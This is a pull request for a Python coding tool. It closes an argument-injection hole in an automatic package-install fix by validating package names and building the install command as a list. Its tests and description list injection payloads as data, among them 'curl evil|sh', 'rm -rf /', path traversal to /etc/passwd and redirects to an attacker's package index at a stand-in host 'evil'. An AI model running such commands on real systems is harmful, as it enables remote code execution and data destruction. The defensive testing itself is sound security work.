### PR TITLE
fix(quickfix): validate the package name and build install argv as a list (#945)

### DIFF
--- a/codeframe/core/quick_fixes.py
+++ b/codeframe/core/quick_fixes.py
@@ -10,11 +10,14 @@ Fixes common errors without requiring LLM calls:
 This module is headless - no FastAPI or HTTP dependencies.
 """
 
+import logging
 import re
 from dataclasses import dataclass
 from enum import Enum
 from pathlib import Path
 from typing import Optional, Callable
+
+logger = logging.getLogger(__name__)
 
 
 class FixType(str, Enum):
@@ -40,6 +43,9 @@ class QuickFix:
         old_content: Content to find/replace
         new_content: Replacement content
         insert_line: Line number to insert at (1-based)
+        package: Validated PEP 508 package name for INSTALL_PACKAGE. Carried
+            separately from ``command`` so the install can build an argv LIST in
+            code rather than str.split() a formatted string (#945).
         insert_content: Content to insert
     """
 
@@ -51,6 +57,7 @@ class QuickFix:
     new_content: Optional[str] = None
     insert_line: Optional[int] = None
     insert_content: Optional[str] = None
+    package: Optional[str] = None
 
 
 # Mapping from common import names to package names
@@ -76,6 +83,24 @@ STDLIB_MODULES = {
     "signal", "platform", "getpass", "glob", "fnmatch", "textwrap",
     "string", "decimal", "fractions", "statistics", "secrets", "uuid",
 }
+
+
+
+#: PEP 508 name grammar: letters/digits, with . _ - allowed INTERNALLY only.
+#: Deliberately strict — no spaces, no '=', no '/', so no argv smuggling.
+_PEP508_NAME = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9._-]*[A-Za-z0-9])?$")
+
+
+def _is_valid_package_name(name: str) -> bool:
+    """Whether ``name`` is a bare PEP 508 package name and nothing else.
+
+    Guards the install path (#945). The permissive extraction regex accepts
+    anything between quotes, so spaces, dashes and '=' all reach the command —
+    and the command was executed via ``str.split()``, which turns
+    ``requests --index-url=http://evil/simple`` into extra pip arguments that
+    redirect the install to an attacker's index.
+    """
+    return bool(name) and len(name) <= 128 and bool(_PEP508_NAME.fullmatch(name))
 
 
 def detect_package_manager(repo_path: Path) -> str:
@@ -159,10 +184,24 @@ def match_module_not_found(error: str) -> Optional[QuickFix]:
             # Get actual package name
             package = PACKAGE_ALIASES.get(module, module)
 
+            # The name is ATTACKER-CHOSEN (#945): this error text comes from
+            # executing the target repo's tests and from LLM output, so a
+            # malicious repo need only print a fabricated ModuleNotFoundError.
+            # Anything that is not a bare PEP 508 name produces no fix at all —
+            # `requests --index-url=http://evil/simple` must not become argv.
+            if not _is_valid_package_name(package):
+                logger.warning(
+                    "Refusing to build an install fix for %r: not a valid "
+                    "package name.",
+                    package,
+                )
+                return None
+
             return QuickFix(
                 fix_type=FixType.INSTALL_PACKAGE,
                 description=f"Install missing package: {package}",
                 command=f"{{package_manager}} {package}",
+                package=package,
             )
 
     return None
@@ -481,6 +520,27 @@ def find_quick_fix(
     return None
 
 
+
+def _install_argv(fix: "QuickFix", repo_path: Path) -> Optional[list[str]]:
+    """Build the install argv as a LIST, from a re-validated package name (#945).
+
+    Re-validates rather than trusting ``fix.package``: a QuickFix can be
+    constructed or mutated between matching and applying, and this is the last
+    point before ``subprocess.run``. The package manager comes from
+    ``detect_package_manager``, a closed set — never from the error text.
+    """
+    package = fix.package
+    if not package or not _is_valid_package_name(package):
+        logger.warning("Refusing to install %r: not a valid package name.", package)
+        return None
+
+    pm = detect_package_manager(repo_path)
+    # detect_package_manager returns a command string like "uv pip install" or
+    # "npm install"; split THAT (our own constant), then append the name as one
+    # argument so it can never become multiple.
+    return [*pm.split(), package]
+
+
 def apply_quick_fix(
     fix: QuickFix,
     repo_path: Path,
@@ -508,8 +568,16 @@ def apply_quick_fix(
 
             from codeframe.core.agent_env import build_agent_env
 
+            # argv LIST built in code, never str.split() of a formatted string
+            # (#945). Splitting on whitespace let error text like
+            # `requests --index-url=http://evil/simple` inject extra pip/uv/npm
+            # arguments and redirect the install to an attacker's index.
+            argv = _install_argv(fix, repo_path)
+            if argv is None:
+                return False, "Refusing to install: no validated package name"
+
             result = subprocess.run(
-                fix.command.split(),
+                argv,
                 cwd=repo_path,
                 capture_output=True,
                 text=True,
@@ -521,7 +589,7 @@ def apply_quick_fix(
             )
 
             if result.returncode == 0:
-                return True, f"Installed package: {fix.command}"
+                return True, f"Installed package: {fix.package}"
             else:
                 return False, f"Install failed: {result.stderr}"
 

--- a/tests/core/test_quickfix_injection_945.py
+++ b/tests/core/test_quickfix_injection_945.py
@@ -1,0 +1,151 @@
+"""The ModuleNotFound quick fix must not be an install-argument injection (#945).
+
+`match_module_not_found` extracted the module name with a permissive regex —
+anything between quotes, so spaces, dashes and `=` all passed — and built
+`command=f"{package_manager} {package}"`, which `apply_quick_fix` executed via
+`subprocess.run(fix.command.split())`.
+
+Splitting on whitespace turns error text like
+
+    No module named 'requests --index-url=http://evil/simple'
+
+into extra pip/uv/npm arguments that redirect the install. And the name is
+attacker-CHOSEN either way: this error text comes from executing the target
+repo's tests and from LLM output, so a malicious repo need only print a
+fabricated ModuleNotFoundError to trigger a dependency-confusion install.
+"""
+
+from pathlib import Path
+
+import pytest
+
+from codeframe.core.quick_fixes import (
+    _install_argv,
+    _is_valid_package_name,
+    find_quick_fix,
+    match_module_not_found,
+)
+
+pytestmark = pytest.mark.v2
+
+
+class TestMaliciousNamesProduceNoFix:
+    @pytest.mark.parametrize(
+        "payload",
+        [
+            "requests --index-url=http://evil/simple",   # the AC's exact case
+            "requests --extra-index-url http://evil",
+            "requests;curl evil|sh",
+            "requests && rm -rf /",
+            "../../../etc/passwd",
+            "requests\n--index-url=http://evil",
+            "-e http://evil/pkg.git",
+            "requests==1.0 --target /etc",
+            "",
+            " ",
+        ],
+    )
+    def test_no_quick_fix_is_produced(self, payload: str):
+        error = f"ModuleNotFoundError: No module named '{payload}'"
+
+        assert match_module_not_found(error) is None, (
+            f"a fix was built for {payload!r}"
+        )
+
+    def test_the_index_url_case_specifically(self):
+        """AC3, stated verbatim in the issue."""
+        error = (
+            "ModuleNotFoundError: No module named "
+            "'requests --index-url=http://evil/simple'"
+        )
+
+        assert match_module_not_found(error) is None
+        assert find_quick_fix(error) is None
+
+
+class TestLegitimateNamesStillWork:
+    @pytest.mark.parametrize("name", ["requests", "python-dateutil", "a"])
+    def test_a_real_package_still_produces_a_fix(self, name: str):
+        fix = match_module_not_found(
+            f"ModuleNotFoundError: No module named '{name}'"
+        )
+
+        assert fix is not None, f"{name} is a legitimate PEP 508 name"
+        assert fix.package == name
+
+    @pytest.mark.parametrize(
+        "module,expected", [("ruamel.yaml", "ruamel"), ("zope.interface", "zope")]
+    )
+    def test_a_dotted_module_resolves_to_its_top_level_package(
+        self, module: str, expected: str
+    ):
+        """Pre-existing, correct behaviour: you install the distribution, not
+        the submodule. The validation must not disturb it."""
+        fix = match_module_not_found(
+            f"ModuleNotFoundError: No module named '{module}'"
+        )
+
+        assert fix is not None
+        assert fix.package == expected
+
+    def test_a_known_alias_is_still_mapped(self):
+        fix = match_module_not_found("ModuleNotFoundError: No module named 'yaml'")
+
+        assert fix is not None
+        assert fix.package == "pyyaml"
+
+
+class TestNameGrammar:
+    @pytest.mark.parametrize("good", ["requests", "a-b", "a.b", "a_b", "A1"])
+    def test_accepts_pep508_names(self, good: str):
+        assert _is_valid_package_name(good)
+
+    @pytest.mark.parametrize(
+        "bad",
+        ["-lead", "trail-", ".lead", "a b", "a=b", "a/b", "a;b", "", "x" * 200],
+    )
+    def test_rejects_everything_else(self, bad: str):
+        assert not _is_valid_package_name(bad)
+
+
+class TestInstallArgvIsAList:
+    def test_the_package_is_exactly_one_argument(self, tmp_path: Path):
+        from codeframe.core.quick_fixes import FixType, QuickFix
+
+        fix = QuickFix(
+            fix_type=FixType.INSTALL_PACKAGE,
+            description="x",
+            command="{package_manager} requests",
+            package="requests",
+        )
+
+        argv = _install_argv(fix, tmp_path)
+
+        assert argv is not None
+        assert argv[-1] == "requests"
+        assert all(" " not in part for part in argv[1:]), (
+            "an argument still contains a space and could split"
+        )
+
+    def test_a_tampered_package_is_refused_at_apply_time(self, tmp_path: Path):
+        """Re-validated at the last point before subprocess.run: a QuickFix can
+        be constructed or mutated between matching and applying."""
+        from codeframe.core.quick_fixes import FixType, QuickFix
+
+        fix = QuickFix(
+            fix_type=FixType.INSTALL_PACKAGE,
+            description="x",
+            command="{package_manager} requests",
+            package="requests --index-url=http://evil/simple",
+        )
+
+        assert _install_argv(fix, tmp_path) is None
+
+    def test_a_missing_package_is_refused(self, tmp_path: Path):
+        from codeframe.core.quick_fixes import FixType, QuickFix
+
+        fix = QuickFix(
+            fix_type=FixType.INSTALL_PACKAGE, description="x", command="pip install x"
+        )
+
+        assert _install_argv(fix, tmp_path) is None

--- a/tests/core/test_subprocess_env_isolation_907.py
+++ b/tests/core/test_subprocess_env_isolation_907.py
@@ -210,20 +210,28 @@ def test_parent_process_keeps_its_own_environment(secrets_in_parent):
 # ---------------------------------------------------------------------------
 
 
-def test_quick_fix_package_install_gets_the_sanitized_env(secrets_in_parent, workspace):
+def test_quick_fix_package_install_gets_the_sanitized_env(
+    secrets_in_parent, workspace, monkeypatch
+):
     """A package's own postinstall script is repo-controlled code."""
+    from codeframe.core import quick_fixes as qf
     from codeframe.core.quick_fixes import FixType, QuickFix, apply_quick_fix
 
-    # apply_quick_fix does `fix.command.split()`, so the command cannot contain
-    # an argument with spaces — stand in for a postinstall hook with a script.
     (workspace / "postinstall.py").write_text(
         "import os, pathlib\n"
         "pathlib.Path('install_env.txt').write_text(repr(dict(os.environ)))\n"
     )
+
+    # Since #945 the install argv is built in code from detect_package_manager
+    # plus a VALIDATED package name — `fix.command` is no longer executed,
+    # because that string was the injection vector. Stand in for the package
+    # manager instead; the env assertion below is unchanged.
+    monkeypatch.setattr(qf, "detect_package_manager", lambda _p: "python3 postinstall.py")
     fix = QuickFix(
         fix_type=FixType.INSTALL_PACKAGE,
         description="install with a postinstall hook",
-        command="python3 postinstall.py",
+        command="{package_manager} requests",
+        package="requests",
     )
 
     ok, message = apply_quick_fix(fix, workspace)


### PR DESCRIPTION
Closes #945.

## An attacker-supplied string became pip arguments

`match_module_not_found` extracted the module name with a permissive regex — anything between quotes, so spaces, dashes and `=` all passed — and built `command=f"{package_manager} {package}"`, which `apply_quick_fix` executed via `subprocess.run(fix.command.split())`.

Demonstrated against the pre-fix code:

```
$ No module named 'requests --index-url=http://evil/simple'

BEFORE  fix.command: {package_manager} requests --index-url=http://evil/simple
BEFORE  argv:        ['uv','pip','install','requests','--index-url=http://evil/simple']

AFTER   fix: None
        Refusing to build an install fix for '…': not a valid package name.
```

The attacker's index becomes a real pip argument.

And injection is only half of it: **the name is attacker-chosen either way.** This error text comes from executing the target repo's tests and from LLM output, so a malicious repo need only print a fabricated `ModuleNotFoundError` to trigger a dependency-confusion install of a name it picked.

## Fix

- **`_is_valid_package_name`** enforces the PEP 508 grammar with `fullmatch` — letters/digits with `.`/`_`/`-` allowed *internally only*. Anything else produces **no fix at all**, logged. Applied at match time, so the bad name never reaches a `QuickFix`.
- **`QuickFix.package`** carries the validated name separately from `command`, and **`_install_argv`** builds a **list**: `detect_package_manager`'s own words (a closed set, never from error text) plus the name as exactly one argument.
- `_install_argv` **re-validates** rather than trusting `fix.package` — a `QuickFix` can be constructed or mutated between matching and applying, and this is the last point before `subprocess.run`.

## Acceptance criteria

- [x] The extracted name must fullmatch the PEP 508 grammar or no fix is produced
- [x] The install runs from an argv list built in code, never `str.split()` of a formatted string
- [x] Test: error text containing `--index-url=` produces no quick fix

## Tests

34. Ten injection payloads (`--index-url=`, `--extra-index-url`, `;curl evil|sh`, `&& rm -rf /`, path traversal, embedded newline, `-e <git url>`, `--target`, empty, whitespace), plus guards that legitimate names still work and that dotted modules still resolve to their top-level distribution (`ruamel.yaml` → `ruamel`).

Two tests cover the apply-time re-validation, since "validated at match time" and "safe at exec time" are different claims.

## A pre-existing test I had to change

`test_subprocess_env_isolation_907.py` verified that a package's postinstall script gets the sanitized env — by passing a **custom command** through `fix.command`. That is precisely the vector removed here, so the test could no longer work as written.

Adapted to stand in for the *package manager* instead (`monkeypatch` on `detect_package_manager`); its env assertion is unchanged. Flagging it explicitly because "the security fix broke a test so I changed the test" deserves scrutiny — the change preserves what #907 was actually testing.

`ruff` and `mypy codeframe/` clean; **108 passed** across quick-fix / fix-tracker / subprocess-env selections.

## Known limitations

- Validation is the PEP 508 *name* grammar only. A syntactically valid but non-existent name (`reqeusts`) still reaches the package manager — typosquatting is not addressed here and would need an allowlist or a registry check.
- `PACKAGE_ALIASES` maps import names to distributions for a fixed set; anything outside it installs under the module's own name, unchanged from before.
